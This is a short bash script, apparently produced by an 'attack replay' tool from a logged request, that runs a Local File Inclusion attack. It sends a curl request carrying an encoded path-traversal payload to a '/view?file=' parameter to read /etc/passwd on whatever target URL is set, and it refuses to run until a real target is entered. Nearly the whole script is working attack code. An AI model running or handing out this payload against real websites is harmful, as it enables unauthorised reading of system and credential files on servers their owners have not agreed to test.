#!/bin/bash
# Advanced Attack Simulation - Local File Inclusion
# Generated by AttackReplay Pro
# Original IP: 45.33.2.8
# Timestamp: 10/Jan/2026:14:22:10 +0000

# CHANGE TARGET_URL BEFORE RUNNING
TARGET_URL="http://your-target-website.com"

if [ "$TARGET_URL" = "http://your-target-website.com" ]; then
    echo "❌ ERROR: Please change TARGET_URL to your actual target!"
    exit 1
fi

echo "🎯 Executing Local File Inclusion attack..."
curl -X GET \
  -H "User-Agent: Mozilla/5.0" \
  -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" \
  -H "Accept-Language: en-US,en;q=0.5" \
  -w "\nStatus: %{http_code}\nTime: %{time_total}s\nSize: %{size_download} bytes\n" \
  -i \
  -k \
  --max-time 15 \
  "$TARGET_URL/view?file=%2e%2e%2f%2e%2e%2fetc/passwd"
